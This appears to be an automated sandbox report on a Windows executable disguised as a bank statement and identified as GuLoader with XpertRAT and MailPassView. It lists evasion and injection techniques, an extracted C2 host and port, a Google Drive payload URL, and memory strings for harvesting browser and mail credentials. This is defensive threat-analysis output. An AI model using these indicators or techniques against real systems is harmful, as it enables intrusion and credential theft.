Windows Analysis Report Statement from QNB.exe

Overview

General Information

Sample Name: Statement from QNB.exe
Analysis ID: 527846
MD5: 9c8b626668e14aeb4355ea39d1520e33
SHA1: 554069b1fb3a80a02840158d31c6c2826812cb40
SHA256: d63ed0450efe28d525954d84556394f21df1c2d882e74b4891492fefab00dd79
Infos:

Most interesting Screenshot:

Detection

GuLoader MailPassView XpertRAT
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Yara detected Generic Dropper
Yara detected MailPassView
Yara detected XpertRAT
Malicious sample detected (through community Yara rule)
GuLoader behavior detected
Yara detected GuLoader
Hides threads from debuggers
Sample uses process hollowing technique
Writes to foreign memory regions
Tries to detect Any.run
Yara detected VB6 Downloader Generic
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Disables user account control notifications
Tries to steal Mail credentials (via file registry)
Changes security center settings (notifications, updates, antivirus, firewall)
Allocates memory in foreign processes
Injects a PE file into a foreign processes
Yara detected WebBrowserPassView password recovery tool
Creates an undocumented autostart registry key
C2 URLs / IPs found in malware configuration
Creates autostart registry keys with suspicious names
Disables UAC (registry)
Uses 32bit PE files
Yara signature match
Antivirus or Machine Learning detection for unpacked file
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality for execution timing, often used to detect debuggers
Abnormal high CPU Usage
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Installs a raw input device (often for capturing keystrokes)
Sample file is different than original file name gathered from version info
Extensive use of GetProcAddress (often used to hide API calls)
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Detected TCP or UDP traffic on non-standard ports
Checks if the current process is being debugged
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality for read data from the clipboard

Classification

AV Detection:

barindex
Found malware configuration
Source: 0000000F.00000002.81297911120.0000000002BE0000.00000040.00000001.sdmp Malware Configuration Extractor: GuLoader {"Payload URL": "https://drive.google.com/uc?export=download&id=1y{\\"}
Source: 12.0.iexplore.exe.400000.3.unpack Malware Configuration Extractor: XpertRAT {"C2 list": ["z1s.us.to:5344"], "Mutex": "D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4", "Group": "Test", "Name": "Xpert", "Version": "3.0.10", "Password": "root"}
Antivirus or Machine Learning detection for unpacked file
Source: 12.0.iexplore.exe.400000.3.unpack Avira: Label: TR/Dropper.Gen
Source: 12.0.iexplore.exe.400000.2.unpack Avira: Label: TR/Dropper.Gen
Source: 16.0.iexplore.exe.400000.1.unpack Avira: Label: SPR/Tool.MailPassView.473
Source: 12.2.iexplore.exe.400000.0.unpack Avira: Label: TR/Dropper.Gen
Source: 12.0.iexplore.exe.400000.1.unpack Avira: Label: TR/Dropper.Gen
Source: 16.0.iexplore.exe.400000.2.unpack Avira: Label: SPR/Tool.MailPassView.473
Source: 12.0.iexplore.exe.400000.0.unpack Avira: Label: TR/Dropper.Gen
Source: 12.0.iexplore.exe.400000.4.unpack Avira: Label: TR/Dropper.Gen
Source: 16.0.iexplore.exe.400000.0.unpack Avira: Label: SPR/Tool.MailPassView.473
Source: 16.0.iexplore.exe.400000.3.unpack Avira: Label: SPR/Tool.MailPassView.473
Source: 16.0.iexplore.exe.400000.4.unpack Avira: Label: SPR/Tool.MailPassView.473
Source: 16.0.iexplore.exe.400000.5.unpack Avira: Label: SPR/Tool.MailPassView.473

Compliance:

barindex
Uses 32bit PE files
Source: Statement from QNB.exe Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Source: unknown HTTPS traffic detected: 142.250.185.78:443 -> 192.168.11.20:49804 version: TLS 1.2
Source: unknown HTTPS traffic detected: 142.250.186.97:443 -> 192.168.11.20:49805 version: TLS 1.2
Source: unknown HTTPS traffic detected: 142.250.185.78:443 -> 192.168.11.20:49827 version: TLS 1.2
Source: unknown HTTPS traffic detected: 142.250.186.97:443 -> 192.168.11.20:49828 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.217.168.14:443 -> 192.168.11.20:49829 version: TLS 1.2
Source: unknown HTTPS traffic detected: 142.250.185.78:443 -> 192.168.11.20:49831 version: TLS 1.2
Source: unknown HTTPS traffic detected: 142.250.186.97:443 -> 192.168.11.20:49832 version: TLS 1.2
Source: unknown HTTPS traffic detected: 142.250.185.78:443 -> 192.168.11.20:49834 version: TLS 1.2
Source: unknown HTTPS traffic detected: 142.250.186.97:443 -> 192.168.11.20:49835 version: TLS 1.2
Source: Binary string: z:\Projects\VS2005\mspass\Release\mspass.pdb source: iexplore.exe, iexplore.exe, 0000000E.00000002.81114917988.0000000000400000.00000040.00000001.sdmp
Source: Binary string: f:\Projects\VS2005\mailpv\Release\mailpv.pdb source: iexplore.exe, iexplore.exe, 00000010.00000000.81129202432.0000000000400000.00000040.00000001.sdmp, iexplore.exe, 00000010.00000000.81127160331.0000000000400000.00000040.00000001.sdmp, iexplore.exe, 00000010.00000002.81131698230.0000000000400000.00000040.00000001.sdmp
Source: Binary string: f:\Projects\VS2005\Dialupass\Release\Dialupass.pdb source: iexplore.exe, iexplore.exe, 00000014.00000000.81194973126.0000000000400000.00000040.00000001.sdmp, iexplore.exe, 00000014.00000002.81199952690.0000000000400000.00000040.00000001.sdmp, iexplore.exe, 00000014.00000000.81193951260.0000000000400000.00000040.00000001.sdmp
Source: Binary string: c:\Projects\VS2005\WebBrowserPassView\Release\WebBrowserPassView.pdb source: iexplore.exe, iexplore.exe, 00000011.00000000.81146013196.0000000000400000.00000040.00000001.sdmp, iexplore.exe, 00000011.00000002.81167076673.0000000000400000.00000040.00000001.sdmp, iexplore.exe, 00000011.00000000.81142234954.0000000000400000.00000040.00000001.sdmp
Source: Binary string: .pdba source: iexplore.exe, 0000000C.00000003.81100972595.0000000005EA1000.00000004.00000001.sdmp
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe Code function: 14_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen, 14_2_00407898
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe Code function: 16_2_00406EC3 FindFirstFileA,FindNextFileA,strlen,strlen, 16_2_00406EC3
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe Code function: 17_2_00408752 FindFirstFileW,FindNextFileW,wcslen,wcslen, 17_2_00408752
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe Code function: 17_2_004080D9 FindFirstFileW,FindNextFileW,FindClose, 17_2_004080D9
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe Code function: 18_2_0040423A FindFirstFileA,FindNextFileA, 18_2_0040423A
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe Code function: 20_2_0040537B FindFirstFileW,FindNextFileW,wcslen,wcslen, 20_2_0040537B

Networking:

barindex
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: https://drive.google.com/uc?export=download&id=1y{\
Source: Malware configuration extractor URLs: z1s.us.to:5344
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: DATACENTERRO DATACENTERRO
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Detected TCP or UDP traffic on non-standard ports
Source: global traffic TCP traffic: 192.168.11.20:49806 -> 194.85.248.156:5344
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49832
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49831
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49830
Source: unknown Network traffic detected: HTTP traffic on port 49834 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49835 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49804 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49828 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49827 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49829 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49832 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49805 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49830 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49831 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49829
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49828
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49805
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49827
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49804
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49835
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49834
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: iexplore.exe, 0000000C.00000003.81135483040.0000000005EC5000.00000004.00000001.sdmp, iexplore.exe, 0000000C.00000003.81173119870.0000000005F1A000.00000004.00000001.sdmp, iexplore.exe, 00000011.00000000.81146013196.0000000000400000.00000040.00000001.sdmp, iexplore.exe, 00000011.00000002.81167076673.0000000000400000.00000040.00000001.sdmp, iexplore.exe, 00000011.00000000.81142234954.0000000000400000.00000040.00000001.sdmp String found in binary or memory: @nss3.dllSOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\seamonkey.exe%programfiles%\Sea MonkeySOFTWARE\Mozillamozilla%s\binPathToExe%programfiles%\Mozilla FirefoxloginshostnameencryptedUsernameencryptedPasswordusernameFieldpasswordFieldhttpRealmnullSELECT id, hostname, httpRealm, formSubmitURL, usernameField, passwordField, encryptedUsername, encryptedPassword FROM moz_logins.---signons.txtsignons2.txtsignons3.txtsignons.sqlitelogins.jsonnetmsg.dllUnknown Error\Error %d: %seditkernel32.dll... open %2.2X %s (%s)Microsoft_WinInetMicrosoft_WinInet_c7@dllhost.exetaskhost.exetaskhostex.exebhvContainersContainerIdNameHistoryContainer_%I64dAccessCountCreationTimeExpiryTimeAccessedTimeModifiedTimeUrlEntryIDvisited:Microsoft\Windows\WebCache\WebCacheV01.datMicrosoft\Windows\WebCache\WebCacheV24.dat0123456789ABCDEFURL index.datSoftware\Microsoft\Internet Explorer\IntelliForms\Storage2https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.facebook.com (Facebook)
Source: iexplore.exe, 0000000C.00000003.81135483040.0000000005EC5000.00000004.00000001.sdmp, iexplore.exe, 0000000C.00000003.81173119870.0000000005F1A000.00000004.00000001.sdmp, iexplore.exe, 00000011.00000000.81146013196.0000000000400000.00000040.00000001.sdmp, iexplore.exe, 00000011.00000002.81167076673.0000000000400000.00000040.00000001.sdmp, iexplore.exe, 00000011.00000000.81142234954.0000000000400000.00000040.00000001.sdmp String found in binary or memory: @nss3.dllSOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\seamonkey.exe%programfiles%\Sea MonkeySOFTWARE\Mozillamozilla%s\binPathToExe%programfiles%\Mozilla FirefoxloginshostnameencryptedUsernameencryptedPasswordusernameFieldpasswordFieldhttpRealmnullSELECT id, hostname, httpRealm, formSubmitURL, usernameField, passwordField, encryptedUsername, encryptedPassword FROM moz_logins.---signons.txtsignons2.txtsignons3.txtsignons.sqlitelogins.jsonnetmsg.dllUnknown Error\Error %d: %seditkernel32.dll... open %2.2X %s (%s)Microsoft_WinInetMicrosoft_WinInet_c7@dllhost.exetaskhost.exetaskhostex.exebhvContainersContainerIdNameHistoryContainer_%I64dAccessCountCreationTimeExpiryTimeAccessedTimeModifiedTimeUrlEntryIDvisited:Microsoft\Windows\WebCache\WebCacheV01.datMicrosoft\Windows\WebCache\WebCacheV24.dat0123456789ABCDEFURL index.datSoftware\Microsoft\Internet Explorer\IntelliForms\Storage2https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.yahoo.com (Yahoo)
Source: iexplore.exe, 0000000E.00000002.81114917988.0000000000400000.00000040.00000001.sdmp String found in binary or memory: Software\America Online\AOL Instant Messenger (TM)\CurrentVersion\Users%s\Loginprpl-msnprpl-yahooprpl-jabberprpl-novellprpl-oscarprpl-ggprpl-ircaccounts.xmlaimaim_1icqicq_1jabberjabber_1msnmsn_1yahoogggg_1http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com equals www.ebuddy.com (eBuggy)
Source: iexplore.exe, 00000011.00000003.81166493558.000000000387B000.00000004.00000001.sdmp, iexplore.exe, 00000011.00000003.81166329896.000000000387B000.00000004.00000001.sdmp, iexplore.exe, 00000011.00000002.81171103182.000000000387B000.00000004.00000001.sdmp String found in binary or memory: amingoverlay:///ms-gamingoverlay://kglcheck/https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/logint equals www.facebook.com (Facebook)
Source: iexplore.exe, 00000011.00000003.81166493558.000000000387B000.00000004.00000001.sdmp, iexplore.exe, 00000011.00000003.81166329896.000000000387B000.00000004.00000001.sdmp, iexplore.exe, 00000011.00000002.81171103182.000000000387B000.00000004.00000001.sdmp String found in binary or memory: amingoverlay:///ms-gamingoverlay://kglcheck/https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/logint equals www.yahoo.com (Yahoo)
Source: iexplore.exe, iexplore.exe, 0000000E.00000002.81114917988.0000000000400000.00000040.00000001.sdmp String found in binary or memory: http://www.ebuddy.com equals www.ebuddy.com (eBuggy)
Source: iexplore.exe String found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook)
Source: bhvD2BB.tmp.17.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
Source: Statement from QNB.exe, 00000004.00000003.80970084976.000000000088D000.00000004.00000001.sdmp, Statement from QNB.exe, 00000004.00000002.81018482063.000000000088D000.00000004.00000020.sdmp, Statement from QNB.exe, 00000004.00000003.80966375673.000000000088D000.00000004.00000001.sdmp, Statement from QNB.exe, 00000004.00000003.80961766607.000000000088D000.00000004.00000001.sdmp, Statement from QNB.exe, 00000004.00000003.80967593583.000000000088D000.00000004.00000001.sdmp, Statement from QNB.exe, 00000004.00000003.80961024720.000000000088D000.00000004.00000001.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000017.00000002.81499259133.00000000008DC000.00000004.00000020.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000019.00000002.81578179889.0000000000A10000.00000004.00000020.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 0000001A.00000002.81651530540.00000000006E0000.00000004.00000020.sdmp String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: iexplore.exe, 0000000C.00000003.81135483040.0000000005EC5000.00000004.00000001.sdmp, iexplore.exe, 0000000C.00000003.81173119870.0000000005F1A000.00000004.00000001.sdmp String found in binary or memory: http://crl.comodoca.com/COMODOCodeSigningCA2.crl0r
Source: Statement from QNB.exe, 00000004.00000003.80970084976.000000000088D000.00000004.00000001.sdmp, Statement from QNB.exe, 00000004.00000002.81018482063.000000000088D000.00000004.00000020.sdmp, Statement from QNB.exe, 00000004.00000003.80966375673.000000000088D000.00000004.00000001.sdmp, Statement from QNB.exe, 00000004.00000003.80961766607.000000000088D000.00000004.00000001.sdmp, Statement from QNB.exe, 00000004.00000003.80967593583.000000000088D000.00000004.00000001.sdmp, Statement from QNB.exe, 00000004.00000003.80961024720.000000000088D000.00000004.00000001.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000017.00000002.81499259133.00000000008DC000.00000004.00000020.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000019.00000002.81578179889.0000000000A10000.00000004.00000020.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 0000001A.00000002.81651530540.00000000006E0000.00000004.00000020.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: bhvD2BB.tmp.17.dr String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
Source: bhvD2BB.tmp.17.dr String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
Source: iexplore.exe, 0000000C.00000003.81135483040.0000000005EC5000.00000004.00000001.sdmp, iexplore.exe, 0000000C.00000003.81173119870.0000000005F1A000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.comodoca.com0
Source: bhvD2BB.tmp.17.dr String found in binary or memory: http://ocsp.digicert.com0
Source: iexplore.exe, iexplore.exe, 0000000E.00000002.81114917988.0000000000400000.00000040.00000001.sdmp String found in binary or memory: http://www.ebuddy.com
Source: D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000017.00000003.81488930602.0000000000955000.00000004.00000001.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000017.00000003.81495319894.0000000000955000.00000004.00000001.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000017.00000002.81500013187.0000000000955000.00000004.00000020.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000017.00000003.81488546638.000000000093B000.00000004.00000001.sdmp String found in binary or memory: http://www.google.com/support/accounts/answer/151657?hl=en
Source: iexplore.exe, iexplore.exe, 0000000E.00000002.81114917988.0000000000400000.00000040.00000001.sdmp, iexplore.exe, 0000000E.00000003.81114391201.00000000032CD000.00000004.00000001.sdmp, iexplore.exe, 0000000E.00000003.81114359568.00000000032CD000.00000004.00000001.sdmp String found in binary or memory: http://www.imvu.com
Source: iexplore.exe, 0000000E.00000002.81115436732.00000000007C9000.00000004.00000001.sdmp String found in binary or memory: http://www.imvu.com/
Source: iexplore.exe, 0000000E.00000003.81114391201.00000000032CD000.00000004.00000001.sdmp, iexplore.exe, 0000000E.00000003.81114359568.00000000032CD000.00000004.00000001.sdmp String found in binary or memory: http://www.imvu.comata
Source: iexplore.exe, 0000000E.00000002.81114917988.0000000000400000.00000040.00000001.sdmp String found in binary or memory: http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com
Source: iexplore.exe, 0000000E.00000002.81114917988.0000000000400000.00000040.00000001.sdmp String found in binary or memory: http://www.imvu.comr
Source: iexplore.exe, iexplore.exe, 00000014.00000000.81194973126.0000000000400000.00000040.00000001.sdmp, iexplore.exe, 00000014.00000002.81199952690.0000000000400000.00000040.00000001.sdmp, iexplore.exe, 00000014.00000000.81193951260.0000000000400000.00000040.00000001.sdmp String found in binary or memory: http://www.nirsoft.net/
Source: Statement from QNB.exe, 00000004.00000003.80961383094.00000000008C3000.00000004.00000001.sdmp, Statement from QNB.exe, 00000004.00000003.80962048215.00000000008C3000.00000004.00000001.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000017.00000003.81485897734.0000000000955000.00000004.00000001.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000019.00000003.81568642879.0000000000A93000.00000004.00000001.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000019.00000003.81572159339.0000000000A92000.00000004.00000001.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000019.00000003.81571978022.0000000000A86000.00000004.00000001.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 0000001A.00000003.81643405594.0000000000741000.00000004.00000001.sdmp String found in binary or memory: https://csp.withgoogle.com/csp/drive-explorer/
Source: D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000017.00000003.81491679427.0000000000955000.00000004.00000001.sdmp String found in binary or memory: https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentSignerHttp/external
Source: Statement from QNB.exe, 00000004.00000003.80961383094.00000000008C3000.00000004.00000001.sdmp, Statement from QNB.exe, 00000004.00000003.80962048215.00000000008C3000.00000004.00000001.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000017.00000003.81485897734.0000000000955000.00000004.00000001.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000019.00000003.81568642879.0000000000A93000.00000004.00000001.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000019.00000003.81572159339.0000000000A92000.00000004.00000001.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000019.00000003.81571978022.0000000000A86000.00000004.00000001.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 0000001A.00000003.81643405594.0000000000741000.00000004.00000001.sdmp String found in binary or memory: https://csp.withgoogle.com/csp/report-to/gse_l9ocaq
Source: Statement from QNB.exe, 00000004.00000003.80967593583.000000000088D000.00000004.00000001.sdmp String found in binary or memory: https://doc-00-5k-docs.googleusercontent.com/
Source: Statement from QNB.exe, 00000004.00000002.81018352703.000000000087F000.00000004.00000020.sdmp String found in binary or memory: https://doc-00-5k-docs.googleusercontent.com/%%doc-00-5k-docs.googleusercontent.com
Source: Statement from QNB.exe, 00000004.00000003.80962048215.00000000008C3000.00000004.00000001.sdmp, Statement from QNB.exe, 00000004.00000002.81018228293.0000000000871000.00000004.00000020.sdmp String found in binary or memory: https://doc-00-5k-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/9ika2j8t
Source: D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 0000001A.00000002.81651530540.00000000006E0000.00000004.00000020.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 0000001A.00000002.81652133637.0000000000741000.00000004.00000001.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 0000001A.00000003.81648906007.0000000000741000.00000004.00000001.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 0000001A.00000003.81643405594.0000000000741000.00000004.00000001.sdmp String found in binary or memory: https://doc-0k-48-docs.googleusercontent.com/
Source: D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000019.00000002.81578179889.0000000000A10000.00000004.00000020.sdmp String found in binary or memory: https://doc-0k-48-docs.googleusercontent.com/%%doc-0k-48-docs.googleusercontent.com
Source: D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000019.00000002.81578885460.0000000000A95000.00000004.00000001.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000019.00000003.81572159339.0000000000A92000.00000004.00000001.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000019.00000003.81571978022.0000000000A86000.00000004.00000001.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000019.00000003.81574632157.0000000000A95000.00000004.00000001.sdmp String found in binary or memory: https://doc-0k-48-docs.googleusercontent.com/3
Source: D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000019.00000002.81578179889.0000000000A10000.00000004.00000020.sdmp String found in binary or memory: https://doc-0k-48-docs.googleusercontent.com/Od
Source: D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 0000001A.00000003.81643405594.0000000000741000.00000004.00000001.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 0000001A.00000002.81651025400.0000000000698000.00000004.00000020.sdmp String found in binary or memory: https://doc-0k-48-docs.googleusercontent.com/docs/securesc/35sumvj0vue2ri2uv2ecasddg28mcdkj/ad6glr8l
Source: D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000017.00000002.81499259133.00000000008DC000.00000004.00000020.sdmp String found in binary or memory: https://doc-0k-48-docs.googleusercontent.com/qr
Source: D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000017.00000003.81488930602.0000000000955000.00000004.00000001.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000017.00000003.81495319894.0000000000955000.00000004.00000001.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000017.00000002.81500013187.0000000000955000.00000004.00000020.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000017.00000003.81491679427.0000000000955000.00000004.00000001.sdmp String found in binary or memory: https://doc-0k-48-docs.googleusercontent.com/v
Source: D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 0000001A.00000003.81646618008.0000000000741000.00000004.00000001.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 0000001A.00000002.81652133637.0000000000741000.00000004.00000001.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 0000001A.00000003.81648906007.0000000000741000.00000004.00000001.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 0000001A.00000003.81643405594.0000000000741000.00000004.00000001.sdmp String found in binary or memory: https://doc-0k-48-docs.googleusercontent.com/~
Source: D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000017.00000002.81499259133.00000000008DC000.00000004.00000020.sdmp String found in binary or memory: https://docs.google.com/:5
Source: D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000017.00000002.81499259133.00000000008DC000.00000004.00000020.sdmp String found in binary or memory: https://docs.google.com/b5
Source: D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000017.00000003.81488930602.0000000000955000.00000004.00000001.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000017.00000003.81489163627.000000000096F000.00000004.00000001.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000017.00000003.81495319894.0000000000955000.00000004.00000001.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000017.00000002.81500013187.0000000000955000.00000004.00000020.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000017.00000003.81491294279.000000000096E000.00000004.00000001.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000017.00000003.81488546638.000000000093B000.00000004.00000001.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000017.00000003.81491679427.0000000000955000.00000004.00000001.sdmp String found in binary or memory: https://docs.google.com/nonceSigner?nonce=1h1o0go4qslkm&continue=https://doc-0k-48-docs.googleuserco
Source: D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 0000001A.00000002.81651530540.00000000006E0000.00000004.00000020.sdmp String found in binary or memory: https://drive.google.com/
Source: D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000017.00000002.81499259133.00000000008DC000.00000004.00000020.sdmp String found in binary or memory: https://drive.google.com/0By
Source: D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000019.00000002.81578179889.0000000000A10000.00000004.00000020.sdmp String found in binary or memory: https://drive.google.com/F
Source: Statement from QNB.exe, 00000004.00000002.81017233540.00000000007F8000.00000004.00000020.sdmp String found in binary or memory: https://drive.google.com/J
Source: D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000017.00000002.81499259133.00000000008DC000.00000004.00000020.sdmp String found in binary or memory: https://drive.google.com/J4
Source: D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000019.00000002.81578179889.0000000000A10000.00000004.00000020.sdmp String found in binary or memory: https://drive.google.com/M
Source: D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 0000001A.00000002.81651530540.00000000006E0000.00000004.00000020.sdmp String found in binary or memory: https://drive.google.com/T
Source: D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 0000001A.00000002.81653026045.0000000002400000.00000004.00000001.sdmp String found in binary or memory: https://drive.google.com/uc?export=download&id=1yzh40PNS32XieWw_X1Kb4gxhZiPD-fNp
Source: D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 0000001A.00000003.81643405594.0000000000741000.00000004.00000001.sdmp String found in binary or memory: https://drive.google.com/uc?export=download&id=1yzh40PNS32XieWw_X1Kb4gxhZiPD-fNpq
Source: Statement from QNB.exe, 00000004.00000003.80961592797.0000000000875000.00000004.00000001.sdmp String found in binary or memory: https://drive.google.com/uc?export=download&id=1yzh40PNS32XieWw_X1Kb4gxhZiPD-fNprezy-qH_LiFQvT2qU
Source: Statement from QNB.exe, 00000004.00000002.81017793700.0000000000842000.00000004.00000020.sdmp String found in binary or memory: https://drive.google.com/uc?export=download&id=1yzh40PNS32XieWw_X1Kb4gxhZiPD-fNptsv
Source: D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 0000001A.00000002.81651299450.00000000006C3000.00000004.00000020.sdmp String found in binary or memory: https://drive.google.com/uc?export=download&id=1yzh40PNS32XieWw_X1Kb4gxhZiPD-fNpu
